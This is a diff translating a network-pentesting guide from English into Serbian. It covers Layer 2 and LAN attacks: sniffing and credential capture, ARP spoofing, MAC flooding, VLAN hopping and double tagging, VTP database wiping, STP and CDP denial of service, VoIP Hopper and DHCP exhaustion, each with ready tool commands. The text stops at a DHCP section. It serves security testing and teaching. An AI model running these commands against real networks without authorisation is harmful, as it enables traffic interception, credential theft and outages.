+**SCTP (Stream Control Transmission Protocol)** je dizajniran da se koristi zajedno sa **TCP (Transmission Control Protocol)** i **UDP (User Datagram Protocol)**. Njegova glavna svrha je da olakša transport telefonskih podataka preko IP mreža, odražavajući mnoge karakteristike pouzdanosti koje se nalaze u **Signaling System 7 (SS7)**. **SCTP** je osnovna komponenta **SIGTRAN** protokol porodice, koja ima za cilj transport SS7 signala preko IP mreža.
 
-The support for **SCTP** is provided by various operating systems, such as **IBM AIX**, **Oracle Solaris**, **HP-UX**, **Linux**, **Cisco IOS**, and **VxWorks**, indicating its broad acceptance and utility in the field of telecommunication and networking.
-
-Two different scans for SCTP are offered by nmap: _-sY_ and _-sZ_
+Podršku za **SCTP** pružaju različiti operativni sistemi, kao što su **IBM AIX**, **Oracle Solaris**, **HP-UX**, **Linux**, **Cisco IOS**, i **VxWorks**, što ukazuje na njegovu široku prihvaćenost i korisnost u oblasti telekomunikacija i umrežavanja.
 
+Dva različita skeniranja za SCTP nudi nmap: _-sY_ i _-sZ_
 ```bash
 # Nmap fast SCTP scan
 nmap -T4 -sY -n -oA SCTFastScan 
 # Nmap all SCTP scan
 nmap -T4 -p- -sY -sV -sC -F -n -oA SCTAllScan 
 ```
-
-### IDS and IPS evasion
+### IDS i IPS izbegavanje
 
 {{#ref}}
 ids-evasion.md
 {{#endref}}
 
-### **More nmap options**
+### **Više nmap opcija**
 
 {{#ref}}
 nmap-summary-esp.md
 {{#endref}}
 
-### Revealing Internal IP Addresses
-
-**Misconfigured routers, firewalls, and network devices** sometimes respond to network probes using **nonpublic source addresses**. **tcpdump** can be utilized to identify packets received from private addresses during testing. Specifically, on Kali Linux, packets can be captured on the **eth2 interface**, which is accessible from the public Internet. It's important to note that if your setup is behind a NAT or a Firewall, such packets are likely to be filtered out.
+### Otkivanje unutrašnjih IP adresa
 
+**Pogrešno konfigurisani ruteri, vatrozidi i mrežni uređaji** ponekad odgovaraju na mrežne probe koristeći **nejavne izvorne adrese**. **tcpdump** se može koristiti za identifikaciju paketa primljenih sa privatnih adresa tokom testiranja. Konkretno, na Kali Linuxu, paketi se mogu uhvatiti na **eth2 interfejsu**, koji je dostupan sa javnog Interneta. Važno je napomenuti da, ako je vaša konfiguracija iza NAT-a ili vatrozida, takvi paketi verovatno neće biti propušteni.
 ```bash
 tcpdump –nt -i eth2 src net 10 or 172.16/12 or 192.168/16
 tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
@@ -216,30 +190,24 @@ listening on eth2, link-type EN10MB (Ethernet), capture size 65535 bytes
 IP 10.10.0.1 > 185.22.224.18: ICMP echo reply, id 25804, seq 1582, length 64
 IP 10.10.0.2 > 185.22.224.18: ICMP echo reply, id 25804, seq 1586, length 64
 ```
-
 ## Sniffing
 
-Sniffing you can learn details of IP ranges, subnet sizes, MAC addresses, and hostnames by reviewing captured frames and packets. If the network is misconfigured or switching fabric under stress, attackers can capture sensitive material via passive network sniffing.
+Sniffing možete saznati detalje o IP opsezima, veličinama podmreža, MAC adresama i nazivima hostova pregledanjem uhvaćenih okvira i paketa. Ako je mreža pogrešno konfigurisana ili je preklopna tkanina pod stresom, napadači mogu uhvatiti osetljive materijale putem pasivnog mrežnog sniffinga.
 
-If a switched Ethernet network is configured properly, you will only see broadcast frames and material destined for your MAC address.
+Ako je preklopna Ethernet mreža pravilno konfigurisana, videćete samo broadcast okvire i materijale namenjene vašoj MAC adresi.
 
 ### TCPDump
-
 ```bash
 sudo tcpdump -i  udp port 53 #Listen to DNS request to discover what is searching the host
 tcpdump -i  icmp #Listen to icmp packets
 sudo bash -c "sudo nohup tcpdump -i eth0 -G 300 -w \"/tmp/dump-%m-%d-%H-%M-%S-%s.pcap\" -W 50 'tcp and (port 80 or port 443)' &"
 ```
-
-One can, also, capture packets from a remote machine over an SSH session with Wireshark as the GUI in realtime.
-
+Može se, takođe, uhvatiti pakete sa udaljenog računara preko SSH sesije koristeći Wireshark kao GUI u realnom vremenu.
 ```
 ssh user@ tcpdump -i ens160 -U -s0 -w - | sudo wireshark -k -i -
 ssh @ tcpdump -i  -U -s0 -w - 'port not 22' | sudo wireshark -k -i - # Exclude SSH traffic
 ```
-
 ### Bettercap
-
 ```bash
 net.sniff on
 net.sniff stats
@@ -248,23 +216,21 @@ set net.sniff.local  #If true it will consider packets from/to this computer, ot
 set net.sniff.filter #BPF filter for the sniffer (default=not arp)
 set net.sniff.regexp #If set only packets matching this regex will be considered
 ```
-
 ### Wireshark
 
-Obviously.
+Očigledno.
 
 ### Capturing credentials
 
-You can use tools like [https://github.com/lgandx/PCredz](https://github.com/lgandx/PCredz) to parse credentials from a pcap or a live interface.
+Možete koristiti alate kao što je [https://github.com/lgandx/PCredz](https://github.com/lgandx/PCredz) za parsiranje kredencijala iz pcap-a ili sa aktivnog interfejsa.
 
-## LAN attacks
+## LAN napadi
 
 ### ARP spoofing
 
-ARP Spoofing consist on sending gratuitous ARPResponses to indicate that the IP of a machine has the MAC of our device. Then, the victim will change the ARP table and will contact our machine every time it wants to contact the IP spoofed.
+ARP Spoofing se sastoji od slanja besplatnih ARP odgovora kako bi se naznačilo da IP mašine ima MAC našeg uređaja. Tada će žrtva promeniti ARP tabelu i kontaktiraće našu mašinu svaki put kada želi da kontaktira spoofovani IP.
 
 #### **Bettercap**
-
 ```bash
 arp.spoof on
 set arp.spoof.targets  #Specific targets to ARP spoof (default=)
@@ -272,37 +238,31 @@ set arp.spoof.whitelist #Specific targets to skip while spoofing
 set arp.spoof.fullduplex true #If true, both the targets and the gateway will be attacked, otherwise only the target (default=false)
 set arp.spoof.internal true #If true, local connections among computers of the network will be spoofed, otherwise only connections going to and coming from the Internet (default=false)
 ```
-
 #### **Arpspoof**
-
 ```bash
 echo 1 > /proc/sys/net/ipv4/ip_forward
 arpspoof -t 192.168.1.1 192.168.1.2
 arpspoof -t 192.168.1.2 192.168.1.1
 ```
-
 ### MAC Flooding - CAM overflow
 
-Overflow the switch’s CAM table sending a lot of packets with different source mac address. When the CAM table is full the switch start behaving like a hub (broadcasting all the traffic).
-
+Preplavite CAM tabelu prekidača slanjem velikog broja paketa sa različitim izvorim MAC adresama. Kada je CAM tabela puna, prekidač počinje da se ponaša kao hub (broadcast-uje sav saobraćaj).
 ```bash
 macof -i 
 ```
+U modernim prekidačima ova ranjivost je ispravljena.
 
-In modern switches this vulnerability has been fixed.
+### 802.1Q VLAN / DTP Napadi
 
-### 802.1Q VLAN / DTP Attacks
+#### Dinamičko Trunkovanje
 
-#### Dynamic Trunking
+**Dynamic Trunking Protocol (DTP)** je dizajniran kao protokol na link sloju kako bi olakšao automatski sistem za trunkovanje, omogućavajući prekidačima da automatski biraju portove za trunk mod (Trunk) ili non-trunk mod. Implementacija **DTP** se često smatra pokazateljem suboptimalnog dizajna mreže, naglašavajući važnost ručne konfiguracije trunkova samo gde je to neophodno i osiguranje pravilne dokumentacije.
 
-The **Dynamic Trunking Protocol (DTP)** is designed as a link layer protocol to facilitate an automatic system for trunking, allowing switches to automatically select ports for trunk mode (Trunk) or non-trunk mode. The deployment of **DTP** is often seen as indicative of suboptimal network design, underscoring the importance of manually configuring trunks only where necessary and ensuring proper documentation.
+Podrazumevano, portovi prekidača su postavljeni da rade u Dynamic Auto modu, što znači da su spremni da iniciraju trunkovanje ako ih obližnji prekidač na to podstakne. Bezbednosna zabrinutost se javlja kada se pentester ili napadač poveže na prekidač i pošalje DTP Desirable okvir, primoravajući port da pređe u trunk mod. Ova akcija omogućava napadaču da enumeriše VLAN-ove kroz analizu STP okvira i zaobiđe VLAN segmentaciju postavljanjem virtuelnih interfejsa.
 
-By default, switch ports are set to operate in Dynamic Auto mode, meaning they are ready to initiate trunking if prompted by a neighboring switch. A security concern arises when a pentester or attacker connects to the switch and sends a DTP Desirable frame, compelling the port to enter trunk mode. This action enables the attacker to enumerate VLANs through STP frame analysis and circumvent VLAN segmentation by setting up virtual interfaces.
-
-The presence of DTP in many switches by default can be exploited by adversaries to mimic a switch's behavior, thereby gaining access to traffic across all VLANs. The script [_**dtpscan.sh**_](https://github.com/commonexploits/dtpscan) is utilized to monitor an interface, revealing whether a switch is in Default, Trunk, Dynamic, Auto, or Access mode—the latter being the only configuration immune to VLAN hopping attacks. This tool assesses the switch's vulnerability status.
-
-Should network vulnerability be identified, the _**Yersinia**_ tool can be employed to "enable trunking" via the DTP protocol, allowing for the observation of packets from all VLANs.
+Prisutnost DTP u mnogim prekidačima podrazumevano može biti iskorišćena od strane protivnika da oponaša ponašanje prekidača, čime se stiče pristup saobraćaju kroz sve VLAN-ove. Skripta [_**dtpscan.sh**_](https://github.com/commonexploits/dtpscan) se koristi za praćenje interfejsa, otkrivajući da li je prekidač u Default, Trunk, Dynamic, Auto ili Access modu—potonji je jedina konfiguracija imuna na napade VLAN hopping. Ovaj alat procenjuje status ranjivosti prekidača.
 
+Ukoliko se identifikuje ranjivost mreže, alat _**Yersinia**_ može biti korišćen za "omogućavanje trunkovanja" putem DTP protokola, omogućavajući posmatranje paketa iz svih VLAN-ova.
 ```bash
 apt-get install yersinia #Installation
 sudo apt install kali-linux-large #Another way to install it in Kali
@@ -313,26 +273,22 @@ yersinia -I #Interactive mode
 
 yersinia -G #For graphic mode
 ```
-
 ![](<../../images/image (269).png>)
 
-To enumerate the VLANs it's also possible to generate the DTP Desirable frame with the script [**DTPHijacking.py**](https://github.com/in9uz/VLANPWN/blob/main/DTPHijacking.py)**. D**o not interrupt the script under any circumstances. It injects DTP Desirable every three seconds. **The dynamically created trunk channels on the switch only live for five minutes. After five minutes, the trunk falls off.**
-
+Da biste enumerisali VLAN-ove, takođe je moguće generisati DTP Desirable okvir pomoću skripte [**DTPHijacking.py**](https://github.com/in9uz/VLANPWN/blob/main/DTPHijacking.py)**. **Ne prekidajte skriptu ni pod kojim okolnostima. Ona injektuje DTP Desirable svake tri sekunde. **Dinamčki kreirani trunk kanali na switch-u žive samo pet minuta. Nakon pet minuta, trunk se gasi.**
 ```
 sudo python3 DTPHijacking.py --interface eth0
 ```
+Želeo bih da istaknem da **Access/Desirable (0x03)** označava da je DTP okvir tipa Desirable, što govori portu da pređe u Trunk režim. A **802.1Q/802.1Q (0xa5)** označava tip enkapsulacije **802.1Q**.
 
-I would like to point out that **Access/Desirable (0x03)** indicates that the DTP frame is of the Desirable type, which tells the port to switch to Trunk mode. And **802.1Q/802.1Q (0xa5**) indicates the **802.1Q** encapsulation type.
-
-By analyzing the STP frames, **we learn about the existence of VLAN 30 and VLAN 60.**
+Analizom STP okvira, **saznajemo o postojanju VLAN 30 i VLAN 60.**
 
 

 
-#### Attacking specific VLANs
-
-Once you known VLAN IDs and IPs values, you can **configure a virtual interface to attack a specific VLAN**.\
-If DHCP is not available, then use _ifconfig_ to set a static IP address.
+#### Napad na specifične VLAN-ove
 
+Kada znate VLAN ID-ove i IP vrednosti, možete **konfigurisati virtuelno sučelje za napad na specifičan VLAN**.\
+Ako DHCP nije dostupan, koristite _ifconfig_ da postavite statičku IP adresu.
 ```
 root@kali:~# modprobe 8021q
 root@kali:~# vconfig add eth1 250
@@ -341,13 +297,13 @@ root@kali:~# dhclient eth1.250
 Reloading /etc/samba/smb.conf: smbd only.
 root@kali:~# ifconfig eth1.250
 eth1.250  Link encap:Ethernet  HWaddr 00:0e:c6:f0:29:65
-          inet addr:10.121.5.86  Bcast:10.121.5.255  Mask:255.255.255.0
-          inet6 addr: fe80::20e:c6ff:fef0:2965/64 Scope:Link
-          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
-          RX packets:19 errors:0 dropped:0 overruns:0 frame:0
-          TX packets:13 errors:0 dropped:0 overruns:0 carrier:0
-          collisions:0 txqueuelen:0
-          RX bytes:2206 (2.1 KiB)  TX bytes:1654 (1.6 KiB)
+inet addr:10.121.5.86  Bcast:10.121.5.255  Mask:255.255.255.0
+inet6 addr: fe80::20e:c6ff:fef0:2965/64 Scope:Link
+UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
+RX packets:19 errors:0 dropped:0 overruns:0 frame:0
+TX packets:13 errors:0 dropped:0 overruns:0 carrier:0
+collisions:0 txqueuelen:0
+RX bytes:2206 (2.1 KiB)  TX bytes:1654 (1.6 KiB)
 
 root@kali:~# arp-scan -I eth1.250 10.121.5.0/24
 ```
@@ -365,31 +321,28 @@ sudo vconfig add eth0 30
 sudo ip link set eth0.30 up
 sudo dhclient -v eth0.30
 ```
+#### Automatski VLAN Hopper
 
-#### Automatic VLAN Hopper
+Diskutovani napad **Dinamičkog trunkinga i kreiranja virtuelnih interfejsa za otkrivanje hostova unutar** drugih VLAN-ova se **automatski izvršava** alatom: [**https://github.com/nccgroup/vlan-hopping---frogger**](https://github.com/nccgroup/vlan-hopping---frogger)
 
-The discussed attack of **Dynamic Trunking and creating virtual interfaces an discovering hosts inside** other VLANs are **automatically performed** by the tool: [**https://github.com/nccgroup/vlan-hopping---frogger**](https://github.com/nccgroup/vlan-hopping---frogger)
+#### Duplo Tagovanje
 
-#### Double Tagging
+Ako napadač zna vrednost **MAC, IP i VLAN ID žrtvovnog hosta**, mogao bi pokušati da **duplo taguje okvir** sa njegovim dodeljenim VLAN-om i VLAN-om žrtve i pošalje paket. Kako **žrtva neće moći da se poveže nazad** sa napadačem, **najbolja opcija za napadača je komunikacija putem UDP-a** sa protokolima koji mogu izvršiti neke zanimljive akcije (kao što je SNMP).
 
-If an attacker knows the value of the **MAC, IP and VLAN ID of the victim host**, he could try to **double tag a frame** with its designated VLAN and the VLAN of the victim and send a packet. As the **victim won't be able to connect back** with the attacker, so the **best option for the attacker is communicate via UDP** to protocols that can perform some interesting actions (like SNMP).
-
-Another option for the attacker is to launch a **TCP port scan spoofing an IP controlled by the attacker and accessible by the victim** (probably through internet). Then, the attacker could sniff in the second host owned by him if it receives some packets from the victim.
+Druga opcija za napadača je da pokrene **TCP port skeniranje lažirajući IP koji kontroliše napadač i koji je dostupan žrtvi** (verovatno putem interneta). Tada bi napadač mogao da prisluškuje na drugom hostu koji mu pripada ako primi neke pakete od žrtve.
 
 ![](<../../images/image (190).png>)
 
-To perform this attack you could use scapy: `pip install scapy`
-
+Da biste izvršili ovaj napad, možete koristiti scapy: `pip install scapy`
 ```python
 from scapy.all import *
 # Double tagging with ICMP packet (the response from the victim isn't double tagged so it will never reach the attacker)
 packet = Ether()/Dot1Q(vlan=1)/Dot1Q(vlan=20)/IP(dst='192.168.1.10')/ICMP()
 sendp(packet)
 ```
-
 #### Lateral VLAN Segmentation Bypass 
 
-If you have **access to a switch that you are directly connected to**, you have the ability to **bypass VLAN segmentation** within the network. Simply **switch the port to trunk mode** (otherwise known as trunk), create virtual interfaces with the IDs of the target VLANs, and configure an IP address. You can try requesting the address dynamically (DHCP) or you can configure it statically. It depends on the case.
+Ako imate **pristup switch-u na koji ste direktno povezani**, imate mogućnost da **obiđete VLAN segmentaciju** unutar mreže. Jednostavno **prebacite port u trunk mode** (poznat i kao trunk), kreirajte virtuelne interfejse sa ID-evima ciljanih VLAN-ova i konfigurišite IP adresu. Možete pokušati da zatražite adresu dinamički (DHCP) ili je možete konfigurisati statički. To zavisi od slučaja.
 
 {{#ref}}
 lateral-vlan-segmentation-bypass.md
@@ -397,143 +350,126 @@ lateral-vlan-segmentation-bypass.md
 
 #### Layer 3 Private VLAN Bypass
 
-In certain environments, such as guest wireless networks, **port isolation (also known as private VLAN)** settings are implemented to prevent clients connected to a wireless access point from directly communicating with each other. However, a technique has been identified that can circumvent these isolation measures. This technique exploits either the lack of network ACLs or their improper configuration, enabling IP packets to be routed through a router to reach another client on the same network.
+U određenim okruženjima, kao što su mreže za goste, **izolacija portova (poznata i kao privatni VLAN)** se implementira kako bi se sprečilo da klijenti povezani na bežični pristupni tačku direktno komuniciraju jedni s drugima. Međutim, identifikovana je tehnika koja može zaobići ove mere izolacije. Ova tehnika koristi ili nedostatak mrežnih ACL-ova ili njihovu nepravilnu konfiguraciju, omogućavajući IP paketima da se rutiraju kroz ruter kako bi došli do drugog klijenta na istoj mreži.
 
-The attack is executed by creating a **packet that carries the IP address of the destination client but with the router's MAC address**. This causes the router to mistakenly forward the packet to the target client. This approach is similar to that used in Double Tagging Attacks, where the ability to control a host accessible to the victim is used to exploit the security flaw.
+Napad se izvršava kreiranjem **paketa koji nosi IP adresu odredišnog klijenta, ali sa MAC adresom rutera**. Ovo uzrokuje da ruter greškom prosledi paket ciljanom klijentu. Ovaj pristup je sličan onom koji se koristi u Double Tagging Attacks, gde se sposobnost kontrole hosta dostupnog žrtvi koristi za iskorišćavanje sigurnosne slabosti.
 
-**Key Steps of the Attack:**
+**Ključni koraci napada:**
 
-1. **Crafting a Packet:** A packet is specially crafted to include the target client's IP address but with the router's MAC address.
-2. **Exploiting Router Behavior:** The crafted packet is sent up to the router, which, due to the configuration, redirects the packet to the target client, bypassing the isolation provided by private VLAN settings.
+1. **Kreiranje paketa:** Paket je posebno kreiran da uključuje IP adresu ciljanog klijenta, ali sa MAC adresom rutera.
+2. **Iskorišćavanje ponašanja rutera:** Kreirani paket se šalje ka ruteru, koji, zbog konfiguracije, preusmerava paket ka ciljanom klijentu, zaobilazeći izolaciju koju pružaju privatni VLAN postavke.
 
 ### VTP Attacks
 
-VTP (VLAN Trunking Protocol) centralizes VLAN management. It utilizes revision numbers to maintain VLAN database integrity; any modification increments this number. Switches adopt configurations with higher revision numbers, updating their own VLAN databases.
+VTP (VLAN Trunking Protocol) centralizuje upravljanje VLAN-ovima. Koristi revizione brojeve za održavanje integriteta VLAN baze podataka; svaka izmena povećava ovaj broj. Switch-evi usvajaju konfiguracije sa višim revizionim brojevima, ažurirajući svoje VLAN baze podataka.
 
 #### VTP Domain Roles
 
-- **VTP Server:** Manages VLANs—creates, deletes, modifies. It broadcasts VTP announcements to domain members.
-- **VTP Client:** Receives VTP announcements to synchronize its VLAN database. This role is restricted from local VLAN configuration modifications.
-- **VTP Transparent:** Doesn't engage in VTP updates but forwards VTP announcements. Unaffected by VTP attacks, it maintains a constant revision number of zero.
+- **VTP Server:** Upravljanje VLAN-ovima—kreira, briše, menja. Emituje VTP obaveštenja članovima domena.
+- **VTP Client:** Prima VTP obaveštenja kako bi sinhronizovao svoju VLAN bazu podataka. Ova uloga je ograničena od lokalnih izmena VLAN konfiguracije.
+- **VTP Transparent:** Ne učestvuje u VTP ažuriranjima, ali prosleđuje VTP obaveštenja. Nije pogođen VTP napadima, održava konstantan revizioni broj nula.
 
 #### VTP Advertisement Types
 
-- **Summary Advertisement:** Broadcasted by the VTP server every 300 seconds, carrying essential domain information.
-- **Subset Advertisement:** Sent following VLAN configuration changes.
-- **Advertisement Request:** Issued by a VTP client to request a Summary Advertisement, typically in response to detecting a higher configuration revision number.
+- **Summary Advertisement:** Emituje ga VTP server svake 300 sekundi, noseći osnovne informacije o domenu.
+- **Subset Advertisement:** Šalje se nakon izmena VLAN konfiguracije.
+- **Advertisement Request:** Izdaje ga VTP klijent da zatraži Summary Advertisement, obično kao odgovor na otkrivanje višeg revizionog broja konfiguracije.
 
-VTP vulnerabilities are exploitable exclusively via trunk ports as VTP announcements circulate solely through them. Post-DTP attack scenarios might pivot towards VTP. Tools like Yersinia can facilitate VTP attacks, aiming to wipe out the VLAN database, effectively disrupting the network.
-
-Note: This discussion pertains to VTP version 1 (VTPv1).
+VTP ranjivosti se mogu iskoristiti isključivo putem trunk portova, jer VTP obaveštenja cirkulišu samo kroz njih. Post-DTP napadni scenariji mogu se preusmeriti ka VTP-u. Alati poput Yersinia mogu olakšati VTP napade, sa ciljem da unište VLAN bazu podataka, efikasno ometajući mrežu.
 
+Napomena: Ova diskusija se odnosi na VTP verziju 1 (VTPv1).
 ````bash
 %% yersinia -G # Launch Yersinia in graphical mode ```
 ````
+U Yersinia-inom grafičkom režimu, izaberite opciju za brisanje svih VTP VLAN-ova da biste očistili VLAN bazu podataka.
 
-In Yersinia's graphical mode, choose the deleting all VTP vlans option to purge the VLAN database.
+### STP Napadi
 
-### STP Attacks
-
-**If you cannot capture BPDU frames on your interfaces, it is unlikely that you will succeed in an STP attack.**
+**Ako ne možete da uhvatite BPDU okvire na vašim interfejsima, malo je verovatno da ćete uspeti u STP napadu.**
 
 #### **STP BPDU DoS**
 
-Sending a lot of BPDUs TCP (Topology Change Notification) or Conf (the BPDUs that are sent when the topology is created) the switches are overloaded and stop working correctly.
-
+Slanjem velikog broja BPDUs TCP (Obaveštenje o promeni topologije) ili Conf (BPDUs koji se šalju kada se topologija kreira) prekidači su preopterećeni i prestaju da rade ispravno.
 ```bash
 yersinia stp -attack 2
 yersinia stp -attack 3
 #Use -M to disable MAC spoofing
 ```
+#### **STP TCP Napad**
 
-#### **STP TCP Attack**
-
-When a TCP is sent, the CAM table of the switches will be deleted in 15s. Then, if you are sending continuously this kind of packets, the CAM table will be restarted continuously (or every 15segs) and when it is restarted, the switch behaves as a hub
-
+Kada se pošalje TCP, CAM tabela prekidača će biti obrisana za 15s. Zatim, ako kontinuirano šaljete ovu vrstu paketa, CAM tabela će se neprekidno restartovati (ili svakih 15 sekundi) i kada se restartuje, prekidač se ponaša kao hub.
 ```bash
 yersinia stp -attack 1 #Will send 1 TCP packet and the switch should restore the CAM in 15 seconds
 yersinia stp -attack 0 #Will send 1 CONF packet, nothing else will happen
 ```
-
 #### **STP Root Attack**
 
-The attacker simulates the behaviour of a switch to become the STP root of the network. Then, more data will pass through him. This is interesting when you are connected to two different switches.\
-This is done by sending BPDUs CONF packets saying that the **priority** value is less than the actual priority of the actual root switch.
-
+Napadač simulira ponašanje prekidača kako bi postao STP root mreže. Tada će više podataka prolaziti kroz njega. Ovo je zanimljivo kada ste povezani na dva različita prekidača.\
+To se postiže slanjem BPDUs CONF paketa koji kažu da je **prioritet** vrednost manja od stvarnog prioriteta stvarnog root prekidača.
 ```bash
 yersinia stp -attack 4 #Behaves like the root switch
 yersinia stp -attack 5 #This will make the device behaves as a switch but will not be root
 ```
-
-**If the attacker is connected to 2 switches he can be the root of the new tree and all the traffic between those switches will pass through him** (a MITM attack will be performed).
-
+**Ako je napadač povezan na 2 prekidača, može postati koren novog stabla i sav saobraćaj između tih prekidača će prolaziti kroz njega** (biće izvršen MITM napad).
 ```bash
 yersinia stp -attack 6 #This will cause a DoS as the layer 2 packets wont be forwarded. You can use Ettercap to forward those packets "Sniff" --> "Bridged sniffing"
 ettercap -T -i eth1 -B eth2 -q #Set a bridge between 2 interfaces to forwardpackages
 ```
+### CDP napadi
 
-### CDP Attacks
+CISCO Discovery Protocol (CDP) je ključan za komunikaciju između CISCO uređaja, omogućavajući im da **identifikuju jedni druge i dele detalje konfiguracije**.
 
-CISCO Discovery Protocol (CDP) is essential for communication between CISCO devices, allowing them to **identify each other and share configuration details**.
+#### Pasivno prikupljanje podataka 
 
-#### Passive Data Collection 
+CDP je konfiguran da emituje informacije kroz sve portove, što može dovesti do bezbednosnog rizika. Napadač, prilikom povezivanja na port prekidača, može koristiti mrežne sniffer-e kao što su **Wireshark**, **tcpdump** ili **Yersinia**. Ova akcija može otkriti osetljive podatke o mrežnom uređaju, uključujući njegov model i verziju Cisco IOS-a koju koristi. Napadač može zatim ciljati specifične ranjivosti u identifikovanoj verziji Cisco IOS-a.
 
-CDP is configured to broadcast information through all ports, which might lead to a security risk. An attacker, upon connecting to a switch port, could deploy network sniffers like **Wireshark**, **tcpdump**, or **Yersinia**. This action can reveal sensitive data about the network device, including its model and the version of Cisco IOS it runs. The attacker might then target specific vulnerabilities in the identified Cisco IOS version.
-
-#### Inducing CDP Table Flooding 
-
-A more aggressive approach involves launching a Denial of Service (DoS) attack by overwhelming the switch's memory, pretending to be legitimate CISCO devices. Below is the command sequence for initiating such an attack using Yersinia, a network tool designed for testing:
+#### Indukcija CDP tabele poplave 
 
+Agresivniji pristup uključuje pokretanje napada uskraćivanja usluge (DoS) preplavljivanjem memorije prekidača, pretvarajući se da su legitimni CISCO uređaji. Ispod je redosled komandi za pokretanje takvog napada koristeći Yersinia, alat za testiranje mreže:
 ```bash
 sudo yersinia cdp -attack 1 # Initiates a DoS attack by simulating fake CISCO devices
 # Alternatively, for a GUI approach:
 sudo yersinia -G
 ```
-
-During this attack, the switch's CPU and CDP neighbor table are heavily burdened, leading to what is often referred to as **“network paralysis”** due to the excessive resource consumption.
+Tokom ovog napada, CPU prekidača i CDP tabela suseda su jako opterećeni, što dovodi do onoga što se često naziva **“paraliza mreže”** zbog prekomerne potrošnje resursa.
 
 #### CDP Impersonation Attack
-
 ```bash
 sudo yersinia cdp -attack 2 #Simulate a new CISCO device
 sudo yersinia cdp -attack 0 #Send a CDP packet
 ```
+Možete takođe koristiti [**scapy**](https://github.com/secdev/scapy/). Obavezno ga instalirajte sa `scapy/contrib` paketom.
 
-You could also use [**scapy**](https://github.com/secdev/scapy/). Be sure to install it with `scapy/contrib` package.
+### VoIP napadi i VoIP Hopper alat
 
-### VoIP Attacks and the VoIP Hopper Tool
+VoIP telefoni, sve više integrisani sa IoT uređajima, nude funkcionalnosti poput otključavanja vrata ili kontrolisanja termostata putem posebnih brojeva telefona. Međutim, ova integracija može predstavljati sigurnosne rizike.
 
-VoIP phones, increasingly integrated with IoT devices, offer functionalities like unlocking doors or controlling thermostats through special phone numbers. However, this integration can pose security risks.
+Alat [**voiphopper**](http://voiphopper.sourceforge.net) je dizajniran da emulira VoIP telefon u raznim okruženjima (Cisco, Avaya, Nortel, Alcatel-Lucent). Otkrije VLAN ID glasovne mreže koristeći protokole kao što su CDP, DHCP, LLDP-MED i 802.1Q ARP.
 
-The tool [**voiphopper**](http://voiphopper.sourceforge.net) is designed to emulate a VoIP phone in various environments (Cisco, Avaya, Nortel, Alcatel-Lucent). It discovers the voice network's VLAN ID using protocols like CDP, DHCP, LLDP-MED, and 802.1Q ARP.
+**VoIP Hopper** nudi tri moda za Cisco Discovery Protocol (CDP):
 
-**VoIP Hopper** offers three modes for the Cisco Discovery Protocol (CDP):
+1. **Sniff Mode** (`-c 0`): Analizira mrežne pakete kako bi identifikovao VLAN ID.
+2. **Spoof Mode** (`-c 1`): Generiše prilagođene pakete koji imituju one stvarnog VoIP uređaja.
+3. **Spoof with Pre-made Packet Mode** (`-c 2`): Šalje pakete identične onima određenog Cisco IP telefonskog modela.
 
-1. **Sniff Mode** (`-c 0`): Analyzes network packets to identify the VLAN ID.
-2. **Spoof Mode** (`-c 1`): Generates custom packets mimicking those of an actual VoIP device.
-3. **Spoof with Pre-made Packet Mode** (`-c 2`): Sends packets identical to those of a specific Cisco IP phone model.
+Preferirani mod za brzinu je treći. Zahteva specificiranje:
 
-The preferred mode for speed is the third one. It requires specifying:
+- Mrežnog interfejsa napadača (`-i` parametar).
+- Imena VoIP uređaja koji se emulira (`-E` parametar), u skladu sa Cisco formatom imenovanja (npr. SEP praćeno MAC adresom).
 
-- The attacker's network interface (`-i` parameter).
-- The name of the VoIP device being emulated (`-E` parameter), adhering to the Cisco naming format (e.g., SEP followed by a MAC address).
+U korporativnim okruženjima, da bi se imitirao postojeći VoIP uređaj, može se:
 
-In corporate settings, to mimic an existing VoIP device, one might:
-
-- Inspect the MAC label on the phone.
-- Navigate the phone's display settings to view model information.
-- Connect the VoIP device to a laptop and observe CDP requests using Wireshark.
-
-An example command to execute the tool in the third mode would be:
+- Ispitati MAC oznaku na telefonu.
+- Navigirati kroz postavke prikaza telefona da bi se videli podaci o modelu.
+- Povezati VoIP uređaj na laptop i posmatrati CDP zahteve koristeći Wireshark.
 
+Primer komande za izvršavanje alata u trećem modu bio bi:
 ```bash
 voiphopper -i eth1 -E 'SEP001EEEEEEEEE ' -c 2
 ```
+### DHCP Napadi
 
-### DHCP Attacks
-
-#### Enumeration
-
+#### Enumeracija
 ```bash
 nmap --script broadcast-dhcp-discover
 Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-16 05:30 EDT
@@ -551,68 +487,61 @@ Pre-scan script results:
 |_    Domain Name: mynet
 Nmap done: 0 IP addresses (0 hosts up) scanned in 5.27 seconds
 ```
-
 **DoS**
 
-**Two types of DoS** could be performed against DHCP servers. The first one consists on **simulate enough fake hosts to use all the possible IP addresses**.\
-This attack will work only if you can see the responses of the DHCP server and complete the protocol (**Discover** (Comp) --> **Offer** (server) --> **Request** (Comp) --> **ACK** (server)). For example, this is **not possible in Wifi networks**.
-
-Another way to perform a DHCP DoS is to send a **DHCP-RELEASE packet using as source code every possible IP**. Then, the server will think that everybody has finished using the IP.
+**Dva tipa DoS** mogu se izvesti protiv DHCP servera. Prvi se sastoji od **simuliranja dovoljno lažnih hostova da se iskoriste sve moguće IP adrese**.\
+Ovaj napad će raditi samo ako možete videti odgovore DHCP servera i završiti protokol (**Discover** (Comp) --> **Offer** (server) --> **Request** (Comp) --> **ACK** (server)). Na primer, ovo je **nemoguće u Wifi mrežama**.
 
+Drugi način za izvođenje DHCP DoS je slanje **DHCP-RELEASE paketa koristeći kao izvorni kod svaku moguću IP adresu**. Tada će server pomisliti da su svi završili sa korišćenjem IP adrese.
 ```bash
 yersinia dhcp -attack 1
 yersinia dhcp -attack 3 #More parameters are needed
 ```
+Automatizovaniji način za to je korišćenje alata [DHCPing](https://github.com/kamorin/DHCPig).
 
-A more automatic way of doing this is using the tool [DHCPing](https://github.com/kamorin/DHCPig)
+Možete koristiti pomenute DoS napade da primorate klijente da dobiju nove zakupnine unutar okruženja i iscrpite legitimne servere tako da postanu neodgovorni. Tako kada se legitimni pokušaju ponovo povezati, **možete poslužiti zlonamerne vrednosti pomenute u sledećem napadu**.
 
-You could use the mentioned DoS attacks to force clients to obtain new leases within the environment, and exhaust legitimate servers so that they become unresponsive. So when the legitimate try to reconnect, **you can server malicious values mentioned in the next attack**.
+#### Postavljanje zlonamernih vrednosti
 
-#### Set malicious values
